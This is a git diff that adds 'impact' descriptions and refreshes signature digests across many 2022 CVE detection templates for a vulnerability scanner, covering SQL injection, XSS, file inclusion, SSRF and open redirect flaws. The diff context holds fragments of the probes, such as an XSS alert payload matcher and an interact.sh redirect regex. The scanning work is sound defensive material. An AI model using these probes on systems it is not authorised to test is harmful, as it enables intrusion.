+# digest: 4a0a0047304502200bd5aaba1a3091eec000348bbe2fd5af2c960959923ab17ff7c06dcbafd3db2802210099280026e1fbab5a8903fa736b61ad06c8d8921cc401062df76456cd44dedd52:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml
index 4890a5f78a..be743bbba6 100644
--- a/http/cves/2022/CVE-2022-27593.yaml
+++ b/http/cves/2022/CVE-2022-27593.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
   remediation: |
     Apply the latest security patches and updates provided by QNAP to fix the local file inclusion vulnerability in QTS Photo Station.
   reference:
@@ -46,5 +48,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a00463044022076fada46bd8adb38d989345b46585f17f55491a1fedf4a3706c69e3ad3462424022022a57ee048d7f03edda24f01504fd6d833213ada64907b630195190cfa399bbe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206e1c69c678a4f08a608062b2594c16d92c27994747f784355b09f81d32a3349102202c50d48db8dea5b57b9feb5b6109742c52af196045ba09771c44ef0f7ea22175:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml
index 1c49ec760a..d3ab39476e 100644
--- a/http/cves/2022/CVE-2022-27849.yaml
+++ b/http/cves/2022/CVE-2022-27849.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or private messages.
   remediation: |
     Update to the latest version of the WordPress Simple Ajax Chat plugin to fix the vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e791f7cee8479f9b2512d115cfb99c4c2c979011188c07a2e3fe8deeee672a8c022100fad74405ff8276cf6c325953b5d34f8d575476eb080bee7884ad5df0ece814a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b7aa00ace4811f427dfe4aa831aeff7646036991d62a2fbc608d66347924a1b2022100c874383c61597febf00943968f3ccb661620ba7e1f19a91cf88f75122d126f21:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml
index 6298c5c70e..f825fc883a 100644
--- a/http/cves/2022/CVE-2022-27926.yaml
+++ b/http/cves/2022/CVE-2022-27926.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Zimbra to fix the XSS vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022007f3e42c2dbd0ed1552be78fd66922feb6d842af85599ccfe83e9fbf4d38edd802203c04378dad12372dc76a797e3ea480a0dfaa1c53c7ddbb2b48ad8b8ef7f6acc6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009d445bc571469167a350cfc4b33f23e42b694fc1503679bec8a6ac4558eac3d30220156470cf174418330cc39d1f2e2461ba5373abaeff546aa8150c56464b790c83:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml
index 7a4a61a63c..d853510b15 100644
--- a/http/cves/2022/CVE-2022-27927.yaml
+++ b/http/cves/2022/CVE-2022-27927.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Microfinance Management System 1.0 is susceptible to SQL Injection.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Microfinance Management System 1.0.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210097e50a4d38b6768aa61fd021fc81967dfd2dbeb17120d4918279f9c4e5da5ded022063c5ced20a09f66670ab78543165c84b0631619341620838a4fe3e13869a9f90:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201cb8e33b9ade5c7fb504b7f87b0a387b50b8a0e699a2206af097f0ddc3713f5402204c49b0f893a94f863d3491b355d3b0b0d62f7399cb0f0ce0e33c78ce5fdf233b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml
index a0e03332a8..784cd455ed 100644
--- a/http/cves/2022/CVE-2022-27984.yaml
+++ b/http/cves/2022/CVE-2022-27984.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.
   remediation: |
     Apply the latest patch or upgrade to a newer version of Cuppa CMS that addresses the SQL injection vulnerability (CVE-2022-27984).
   reference:
@@ -52,4 +54,4 @@ http:
           - 'contains(content_type_2, "text/html")'
           - 'contains(body_2, "components/menu/classes/functions.php")'
         condition: and
-# digest: 4a0a00473045022100b8a00d3d118dceb358444fe52b0886428ab86d751a0c4cfd08fffc4e099873ec02201c57a3144994000ed53ff7cedc4313e2f8310bd3bed6eb158b9031289df19d1f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e75e1033d953609ba3f63fbee47fdda11bffc0317e3fe77ec47c8d56fbf5d4b4022100c25d2eb59fde0f33b3d867815be2a27350259e08843e3e068de0a76f04960f4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml
index 0f60fa7fce..dbe157268f 100644
--- a/http/cves/2022/CVE-2022-27985.yaml
+++ b/http/cves/2022/CVE-2022-27985.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.
   remediation: |
     Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.
   reference:
@@ -60,4 +62,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ffb7e5172ab28f6f4947528375408dfbbdbf943a451ca13bd131c612aeb0a811022066f3011eb90cd6c70bfb25f2ec11388eb18ceba4e1662a690ea62c4c17e9f101:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201fb8699c02f35d593d9940e457a1430824e58d96a29712369837a5c3d3fcf9e00221009c2bd806682bd9848f0f83998cc25ab97774de9d89668c28b848165655858b3b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-28022.yaml b/http/cves/2022/CVE-2022-28022.yaml
index fb254974bd..d4996bbad5 100644
--- a/http/cves/2022/CVE-2022-28022.yaml
+++ b/http/cves/2022/CVE-2022-28022.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'contains(header, "text/html")'
           - 'contains(body, "status\":\"success")'
         condition: and
-# digest: 4b0a00483046022100df5e77e2f4cac723ff98eeefd7dbc38e698903489d5d0e59a171decf9f47da6e022100bb33c51e3f56c37e5112964c23076c816872e3692ff1e3fed638f7ac756b6062:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fca4a63e8fc07aa9faae69689faa53ea74945d9593cd732f70ae2be94a5a67f6022100a6b3523588e066abb0a8e9aa6d97557584794b695fd74d2cd5e8fe73fe04193b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml
index 670a2b4d66..aa63f395bd 100644
--- a/http/cves/2022/CVE-2022-28023.yaml
+++ b/http/cves/2022/CVE-2022-28023.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'contains(header, "text/html")'
           - 'contains(body, "status\":\"success")'
         condition: and
-# digest: 490a004630440220637e4e217741c68643f9469af840b80667605a8a0765ad799f17f574b4b462ec0220092744971b74b8de0c431dcb533252af9547d3d8c436985641f42c0ea3126a00:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200dc439710e126214db2cf042fdd12581140c8ca700c4335adae1710a8086bf75022100c6bd841a46c9ca2ca83d12cb3972ddd924d4980dd015f67dbe90bdbf3bd2ff82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml
index 645df6502f..61f88f92bf 100644
--- a/http/cves/2022/CVE-2022-28032.yaml
+++ b/http/cves/2022/CVE-2022-28032.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     AtomCMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_ajax_pages.php
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: Fixed in version Atom CMS v2.1
   reference:
     - https://github.com/thedigicraft/Atom.CMS/issues/263
@@ -39,4 +41,4 @@ http:
           - 'status_code == 200'
           - 'contains(body, "Page Deleted")'
         condition: and
-# digest: 4b0a00483046022100ee8b7b55429905184b0f7ec7cce9f281a4899c301c892a9455774ffc1fe4d8ea0221008c3914748f5372dc67120261adff1e60f0a8034759e80d8a78574efcf8938afa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022045597c3e09c1c026f252d199389fcdc1bcc6eea1fba29a133f91e92b38393859022100c4815732d23afd0441a37eb54bd38371bf63e7cfdfc1b74d31ec87a20a5db6be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml
index d656222af8..b433c5e695 100644
--- a/http/cves/2022/CVE-2022-28079.yaml
+++ b/http/cves/2022/CVE-2022-28079.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 302
-# digest: 4b0a00483046022100dcebb4ef29df4ab9b97a3b03e3ba5ddbf52940062887802f4045fb4f4c538f3a022100e0118b1675031c93e1976be9b0ea800d6dea5e9da0664b9a69ff36c207317337:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022020b33b2b932537fc0a4ea3546b67999c9a5177791f543f5e08445c1418d097990220360078eef7fb306bdf711aa161811ed96c55c7be19a3e2b9ddf23a8b533d706e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml
index d095917850..5789802c07 100644
--- a/http/cves/2022/CVE-2022-28080.yaml
+++ b/http/cves/2022/CVE-2022-28080.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Royal Event is vulnerable to a SQL injection vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire database.
   remediation: |
     To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks.
   reference:
@@ -77,4 +79,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022075449f38cf8657d4a01284864ecb4929ac4e2e11d9b5b3e766e1ab6791391e0b0220091c0070767be84ed6d69185132b0b72f4534bb58c9b91851c30e43678ac08a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e1651e968717d73648a2104adcb80b5e9238ecf86402034dd6e00bf4beb8fc1d022100bf735d155de83f8becfbe851be1a0dd16cc5d83415cd996268554963f67b59de:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml
index f99093adfc..81e30b0674 100644
--- a/http/cves/2022/CVE-2022-28117.yaml
+++ b/http/cves/2022/CVE-2022-28117.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Navigate CMS 2.9.4 is susceptible to server-side request forgery via feed_parser class. This can allow a remote attacker to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter, thus enabling possible theft of sensitive information, data modification, and/or unauthorized operation execution.
+  impact: |
+    An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.
   remediation: |
     Upgrade to a patched version of Navigate CMS or apply the vendor-provided patch to mitigate the SSRF vulnerability.
   reference:
@@ -80,4 +82,4 @@ http:
           - csrf_token" value="([a-f0-9]{64})
         internal: true
         part: body
-# digest: 4b0a0048304602210088434d398234ffcc8088d293bd43174f3b470f29efd71e82e5fc2ded6b4b9404022100c3d4e2fab26416c3ce910e15a54e4a7663f384406b4fe54eefea6ba0b64aa958:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022050d5e0cc478a788dd378cc05561c7616618d82d79cd7d190bc47dc4b79e5814d02210097e62a8101f3a74d893f172194144538981d3be7bd58f2d94833aeb4035a5584:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml
index 879ddbd1ca..6f5f91a74e 100644
--- a/http/cves/2022/CVE-2022-28219.yaml
+++ b/http/cves/2022/CVE-2022-28219.yaml
@@ -7,6 +7,8 @@ info:
   description: |
     Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an
     unauthenticated XML entity injection attack that can lead to remote code execution.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or perform remote code execution on the affected system.
   remediation: |
     Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
     is configured with a dedicated service account with restricted privileges.
@@ -62,4 +64,4 @@ http:
         part: body
         words:
           - "ManageEngine"
-# digest: 4b0a0048304602210098535686a21b6e4b0076b4e4308e64247dbe3feb93dfd1dc00e7d379e731d75002210096ce2a1f3225780ebcccd31c48e3c2de2337e6fc3408c799e111b1dc33ccd3d6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202d31bce59b2467f54755f017186703f9355353ef2bc4fc794f26a4169091e948022100a83edd4efbbe51c2029acedd77580fc8a2bbe0860e6bc69132808008d4cf5940:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml
index 00e39e9512..6742027ed9 100644
--- a/http/cves/2022/CVE-2022-28290.yaml
+++ b/http/cves/2022/CVE-2022-28290.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Country Selector plugin prior to 1.6.6 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the country and lang parameters before outputting them back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update WordPress Country Selector plugin to version 1.6.6 or later to mitigate the vulnerability.
   reference:
@@ -61,4 +63,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a152d37fc0cc59837b859f9997db365100d8a9b9c4a8f772a9309b2e123f12790220193c5d7ee23ae9dbe021aeef8998d6de0669b23aad5a97e3f29c8120874ada60:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009df7a478a3504d8a97a0399345cc00bb97f7d7fa8b562b95e1eae0ab13f6f4df022100939f8aa22f64aa127210cfbab1f03fee13b36b271d9070dfc1eb2e1aa11b4d31:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml
index d46c87ad66..b08bc457d2 100644
--- a/http/cves/2022/CVE-2022-28363.yaml
+++ b/http/cves/2022/CVE-2022-28363.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Reprise License Manager or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a55877d03ff6d7cfc33886232bf6dd8cc64a06578d970cf263ab421fc38b119302201539c83ccf697d9a6ab82da947a63ce11373c9c45f2600dc2504683db7231f97:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d093b317b2f54c65291c2be264f8698110565d6ddf8884847af3aab5c870170c022100a0ea673e3b91702d9837d0a7be9aaf18c5d3c03b91bcf2b724e2082c4a8de695:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml
index 0309784085..dbffc53736 100644
--- a/http/cves/2022/CVE-2022-28365.yaml
+++ b/http/cves/2022/CVE-2022-28365.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Reprise License Manager 14.2 is susceptible to information disclosure via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. An attacker can possibly obtain further sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of Reprise License Manager.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008bd2fdb6d8f2081df642f6e2ab034a4634eaf153bf8059b3f15836520e6a1bb0022100eda5b0dc2f13af9a2ed79f5496906420514502de17acfe1dbfe891f697c9f40f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e13b01a725dd31c721f5f70946238eb9f3e864f2d547b46c99d746523b9b2aa802206e671a945afc7011183dfc497f9e7388e0accf8420af3e20a24d9d8c70bc0f84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml
index 456bc14331..77c0f07512 100644
--- a/http/cves/2022/CVE-2022-2863.yaml
+++ b/http/cves/2022/CVE-2022-2863.yaml
@@ -5,6 +5,8 @@ info:
   author: tehtbl
   severity: medium
   description: WordPress WPvivid Backup version 0.9.76 is vulnerable to local file inclusion because the plugin does not sanitize and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation.
   remediation: Upgrade to version 0.9.76 or later.
   reference:
     - https://seclists.org/fulldisclosure/2022/Oct/0
@@ -61,4 +63,4 @@ http:
           - '"_ajax_nonce":"([0-9a-z]+)"'
         internal: true
         part: body
-# digest: 4b0a00483046022100d72a1d5bf4e9f710f5c91346fe4ef146b80cd07d494f3ccbff819565e62fdc9e022100be7892d1f7e37d3125b17c80aac8af960085595377ddb1c7d49dd7ec4cea5bad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008f6426ab0c50f16014e30b1c5eb255d8ab315e278505ed73181bc50dfb6fdcd3022100cdeea06b32a71dd0d2c08f832227098866b24c69d656c44db8e06b2fc94b6a8b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-28923.yaml b/http/cves/2022/CVE-2022-28923.yaml
index c342a15c26..98751a27f5 100644
--- a/http/cves/2022/CVE-2022-28923.yaml
+++ b/http/cves/2022/CVE-2022-28923.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Caddy 2.4.6 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site via a crafted URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,.
   remediation: |
     Upgrade Caddy to version 2.4.7 or later to mitigate the vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 490a0046304402202d0fa2f079c629729782aa9dfacae78542164f62e1bdebfabb0ed2c6ab817fa6022066f0923569ada29c9dcde2f9b44c404cd10310f83a8a1c434574a9a1808b4230:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e5248665ec427b675bfe73008eb645a0ae62444094b076f67ba1a131a4339a9a02207437068cd417229080549b6efbcaeeae3be47c9c8f97cf92271abd13b69e1f42:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml
index 0436c6b1aa..c926af055b 100644
--- a/http/cves/2022/CVE-2022-28955.yaml
+++ b/http/cves/2022/CVE-2022-28955.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     D-Link DIR-816L_FW206b01 is susceptible to improper access control. An attacker can access folders folder_view.php and category_view.php and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected router.
   remediation: |
     Apply the latest firmware update provided by D-Link to fix the access control issue.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220362025b5346150505f57625493f6720c0a5d456582956ee7e8a67824bc2f9c30022100f466f9decec80360395e7643ee85a0b0a4336ca2710d03b2e3bbd5b0a4dea659:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b98007e828f7933f7f2c1adcabdb16d246f980d1273bc1b000fc18f602de4c2c0221009b71c54f7dc52970e011e37e0fd877bb65a28aa2b66a62fdbd01323497a21aab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml
index 5fd7486638..ebd1391077 100644
--- a/http/cves/2022/CVE-2022-29004.yaml
+++ b/http/cves/2022/CVE-2022-29004.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Diary Management System 1.0 contains a cross-site scripting vulnerability via the Name parameter in search-result.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -58,4 +60,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e12cd113e38ce64563c5def4dddc50c179ba72ad2fdde593c917eeade654e8a002207306b48301e011ac29752d0fac3e81a16099620cba5aea1493f3c49418cf03b9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202494ec49e3b3f826497cf73c0f624a0501b75382df9b9ed698ac1b5c7f4c367702202efadfdb1708ba9c8ed27450a2bc4aaa7e27b3e9c3d1ff5d9ef0a2abd76e8d08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml
index f1b6f64e8b..08a3b1cf2d 100644
--- a/http/cves/2022/CVE-2022-29005.yaml
+++ b/http/cves/2022/CVE-2022-29005.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website.
   remediation: |
     To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -57,4 +59,4 @@ http:
           - 'status_code_3 == 200'
           - contains(body_3, 'admin-name\">{{str}}<script>alert(document.domain);</script>')
         condition: and
-# digest: 4a0a0047304502205fa97f5921733ec2e4e4f6b3fb0b991de81eff49d7de6f5898dfc2a6eb9b411b022100cd9deba1da3fbc67a95a715de4514816c96edadcb90e755d74fb8fb2e46567e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200eb18eb9c1c15ca8f3e88c9c6ce8a04e8c0d9af90e5581366cca9f3fff2f2ea602205c4afb75f442a22e230d93f3c0d56987a254818c60555aaed499daa110e10f63:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml
index 42efbcb505..3bcd2f8c9c 100644
--- a/http/cves/2022/CVE-2022-29006.yaml
+++ b/http/cves/2022/CVE-2022-29006.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Directory Management System 1.0.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205fbb117d1227aff86bc4dbc91cf6588aeb6ea2d07708545913b4544b0856b05c022065fa0d6b98246861bd271fd8d79dbfa6c648df19ef09c19149965475c4379567:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009605f11ec46bb134ce0f05c03adc948d200cb87bdaf058a77af8e80a98e22c170220699a176a5254e031ae011da5bab245b4c93d66a42d7588e772951b41f5753626:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml
index a8051bdfbf..1af9396f3e 100644
--- a/http/cves/2022/CVE-2022-29007.yaml
+++ b/http/cves/2022/CVE-2022-29007.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220764b124a59f624e9a585adc09117972f33221b89a13266a843a027badf95380d02207549271b80eb242ed514f59fc77bb831fe2286e533b3cd9234cdcbe5c79a2e52:922c64590222798bb761d5b6d8e72950
